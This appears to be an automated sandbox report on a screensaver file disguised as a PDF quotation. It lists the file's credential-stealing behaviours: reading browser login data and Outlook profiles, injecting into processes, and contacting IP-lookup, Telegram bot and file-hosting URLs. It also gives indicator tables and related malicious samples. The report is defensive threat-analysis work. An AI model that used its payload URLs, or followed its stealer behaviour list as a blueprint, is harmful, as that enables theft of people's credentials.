                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory written: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess created: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1988, type: MEMORYSTR
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 00000004.00000002.3287257268.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1988, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1988, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                111
                Process Injection
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Email Collection
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                1
                Scheduled Task/Job
                31
                Virtualization/Sandbox Evasion
                LSASS Memory11
                Security Software Discovery
                Remote Desktop Protocol11
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                111
                Process Injection
                Security Account Manager1
                Process Discovery
                SMB/Windows Admin Shares1
                Data from Local System
                2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information
                NTDS31
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture13
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information
                LSA Secrets1
                Application Window Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Software Packing
                Cached Domain Credentials1
                System Network Configuration Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSync13
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                QUOTATION_JANQUOTE312025#U00faPDF.scr34%VirustotalBrowse
                QUOTATION_JANQUOTE312025#U00faPDF.scr14%ReversingLabsWin32.Trojan.Sonbokli
                QUOTATION_JANQUOTE312025#U00faPDF.scr100%AviraHEUR/AGEN.1308518
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb950%Avira URL Cloudsafe
                https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yR0%Avira URL Cloudsafe
                https://3007.filemail.com0%Avira URL Cloudsafe
                http://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRb0%Avira URL Cloudsafe
                http://3007.filemail.com0%Avira URL Cloudsafe
                http://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb950%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                ip.3007.filemail.com
                193.30.119.107
                truefalse
                  unknown
                  reallyfreegeoip.org
                  104.21.112.1
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      3007.filemail.com
                      unknown
                      unknowntrue
                        unknown
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95false
                          • Avira URL Cloud: safe
                          unknown
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            http://checkip.dyndns.org/false
                              high
                              http://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95false
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://stackoverflow.com/q/14436606/23354QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/mgravell/protobuf-netJQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://3007.filemail.comQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://reallyfreegeoip.orgdQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.000000000321D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/mgravell/protobuf-netQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmpfalse
                                        high
                                        http://checkip.dyndns.orgQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/mgravell/protobuf-netiQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.org/xml/8.46.123.189lQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.comdQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://stackoverflow.com/q/11564914/23354;QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  high
                                                  https://stackoverflow.com/q/2152978/23354QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                    high
                                                    http://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbQUOTATION_JANQUOTE312025#U00faPDF.scrfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://reallyfreegeoip.org/xml/8.46.123.189dQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://reallyfreegeoip.orgQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.000000000321D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.orgdQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://reallyfreegeoip.orgQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://checkip.dyndns.comQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://checkip.dyndns.org/dQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://3007.filemail.comQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://reallyfreegeoip.org/xml/QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.21.112.1
                                                                    reallyfreegeoip.orgUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    193.30.119.107
                                                                    ip.3007.filemail.comunknown
                                                                    680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                                                    193.122.6.168
                                                                    checkip.dyndns.comUnited States
                                                                    31898ORACLE-BMC-31898USfalse
                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1614909
                                                                    Start date and time:2025-02-14 09:19:47 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 5m 48s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Run name:Potential for more IOCs and behavior
                                                                    Number of analysed new started processes analysed:5
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:QUOTATION_JANQUOTE312025#U00faPDF.scr
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:QUOTATION_JANQUOTE312025PDF.scr
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winSCR@3/0@3/3
                                                                    EGA Information:
                                                                    • Successful, ratio: 50%
                                                                    HCA Information:
                                                                    • Successful, ratio: 71%
                                                                    • Number of executed functions: 117
                                                                    • Number of non-executed functions: 20
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .scr
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target QUOTATION_JANQUOTE312025#U00faPDF.scr, PID 1988 because it is empty
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    TimeTypeDescription
                                                                    03:20:37API Interceptor29945x Sleep call for process: QUOTATION_JANQUOTE312025#U00faPDF.scr modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    104.21.112.1AGODA COMPANY PTE LTD.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tumbetgirislinki.fit/ftbq/?FZQ=issILDDGsHFYNfmqjTyaiRCxUP7MBLRR+fLjt4U/PjAATIgmLn5xJ6OEKWMTVCkC8eR6wGGZNe6kNExjC2H5xoO/guvwFBH7lbkJQqoMGH7yD90zbw==&_j=6nA47ZHp
                                                                    http://absoluteprintinequipment.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • absoluteprintinequipment.com/
                                                                    06OJsSI8WG.exeGet hashmaliciousFormBookBrowse
                                                                    • www.newanthoperso.shop/b4b3/
                                                                    Solicitud de cotizacion.exeGet hashmaliciousFormBookBrowse
                                                                    • www.sigaque.today/n61y/
                                                                    NOAH CRYPT.exeGet hashmaliciousFormBookBrowse
                                                                    • www.clouser.store/0izs/
                                                                    X4pCdhjJCI.exeGet hashmaliciousFormBookBrowse
                                                                    • www.buyspeechst.shop/ub3i/
                                                                    k2ax9F6u0c.exeGet hashmaliciousFormBookBrowse
                                                                    • www.enoughmoney.online/nf1d/
                                                                    scan_07022025_pdf.exeGet hashmaliciousDarkTortilla, LokibotBrowse
                                                                    • touxzw.ir/jay/five/fre.php
                                                                    QUOTE#230188.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tradingreviewer.net/xy66/
                                                                    http://h7h.wartabuvar.orgGet hashmaliciousHTMLPhisherBrowse
                                                                    • h7h.wartabuvar.org/page/images/verify_sms.png
                                                                    193.122.6.168Purchase Order No.1364.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    Opsprtning.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    (_TOSAM) 13 _UBAT 2025 HAFTALIK EKONOM_ BLTEN_.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • checkip.dyndns.org/
                                                                    SecuriteInfo.com.FileRepMalware.20861.8466.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    Fizet#U00e9si_szelv#U00e9ny,png.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    SecuriteInfo.com.Win32.MalwareX-gen.10190.17746.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    RFQ_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • checkip.dyndns.org/
                                                                    ORDER_NO.9077364653BBG.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • checkip.dyndns.org/
                                                                    Tilintetgrelsen.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    checkip.dyndns.comkduYCOzG3unrjuS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 132.226.8.169
                                                                    Purchase Order No.1364.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    SHIP PARTICULARS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.122.130.0
                                                                    4a. RFx-4045.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    Poundbreach178.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    Opsprtning.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    RFQ-Ref-QE-69774-LD,PDF.vbsGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                    • 132.226.247.73
                                                                    DHL AWB Document_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    MAERSK Shipping Document - Bill of Lading - SWB Receipt - Packing List_PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.8.169
                                                                    MAERSK Shipping Document - Bill of Lading - Packing List - SWB Receipt _PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.8.169
                                                                    reallyfreegeoip.orgkduYCOzG3unrjuS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.32.1
                                                                    Purchase Order No.1364.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.16.1
                                                                    SHIP PARTICULARS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.48.1
                                                                    4a. RFx-4045.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    Poundbreach178.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.32.1
                                                                    Opsprtning.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.48.1
                                                                    RFQ-Ref-QE-69774-LD,PDF.vbsGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                    • 104.21.80.1
                                                                    DHL AWB Document_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    MAERSK Shipping Document - Bill of Lading - Packing List - SWB Receipt _PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.16.1
                                                                    Limitarian.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    ORACLE-BMC-31898USPurchase Order No.1364.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    SHIP PARTICULARS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.122.130.0
                                                                    Poundbreach178.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    Opsprtning.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 193.122.6.168
                                                                    DHL AWB Document_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    Limitarian.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 193.122.130.0
                                                                    Gruss.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    (_TOSAM) 13 _UBAT 2025 HAFTALIK EKONOM_ BLTEN_.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 193.122.6.168
                                                                    Gruss.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    fact.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    DFNVereinzurFoerderungeinesDeutschenForschungsnetzeseOrden de compra_ 212133545.pdf______________________.vbsGet hashmaliciousAgentTeslaBrowse
                                                                    • 193.30.119.105
                                                                    MAERSK Shipping Document - Bill of Lading - SWB Receipt - Packing List_PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.30.119.105
                                                                    MAERSK Shipping Document - Bill of Lading - Packing List - SWB Receipt _PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.30.119.105
                                                                    res.arm.elfGet hashmaliciousUnknownBrowse
                                                                    • 132.252.127.31
                                                                    res.x86.elfGet hashmaliciousUnknownBrowse
                                                                    • 141.93.222.140
                                                                    res.mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 141.23.198.245
                                                                    Fantazy.ppc.elfGet hashmaliciousMiraiBrowse
                                                                    • 141.61.212.217
                                                                    https://conflictescalationstrategy.provokingconflict.cfd/help?32161731835980&extra_param_1=cul3opt3kl6c73b9fjq0Get hashmaliciousUnknownBrowse
                                                                    • 141.95.100.236
                                                                    https://www.theintentionaliep.com/product/digital-special-education/Get hashmaliciousUnknownBrowse
                                                                    • 141.95.98.65
                                                                    res.arm.elfGet hashmaliciousUnknownBrowse
                                                                    • 141.60.78.84
                                                                    CLOUDFLARENETUSkduYCOzG3unrjuS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.32.1
                                                                    https://xoawevk9553z3y2hgkav.lumpnk.ru/vXsP8/Get hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    https://wix-filters.autopolis.lt/modules/banner/banner.php?page_id=34&banner_id=386&url=https://tiny-raincoat-big.on-fleek.app/nova.html#Info@ips-intelligence.comGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.25.14
                                                                    Purchase Order No.1364.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.80.1
                                                                    payload.ps1Get hashmaliciousKdot StealerBrowse
                                                                    • 104.16.124.96
                                                                    SHIP PARTICULARS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.48.1
                                                                    4a. RFx-4045.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    http://colruyt.usGet hashmaliciousUnknownBrowse
                                                                    • 172.66.0.227
                                                                    payload.ps1Get hashmaliciousKdot StealerBrowse
                                                                    • 104.16.124.96
                                                                    Poundbreach178.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.32.1
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    54328bd36c14bd82ddaa0c04b25ed9adkduYCOzG3unrjuS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    SHIP PARTICULARS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    4a. RFx-4045.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    Poundbreach178.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    Opsprtning.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    RFQ-Ref-QE-69774-LD,PDF.vbsGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                    • 104.21.112.1
                                                                    DHL AWB Document_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    MAERSK Shipping Document - Bill of Lading - Packing List - SWB Receipt _PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    Limitarian.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    Gruss.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 104.21.112.1
                                                                    3b5074b1b5d032e5620f69f9f700ff0ekduYCOzG3unrjuS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 193.30.119.107
                                                                    payload.ps1Get hashmaliciousKdot StealerBrowse
                                                                    • 193.30.119.107
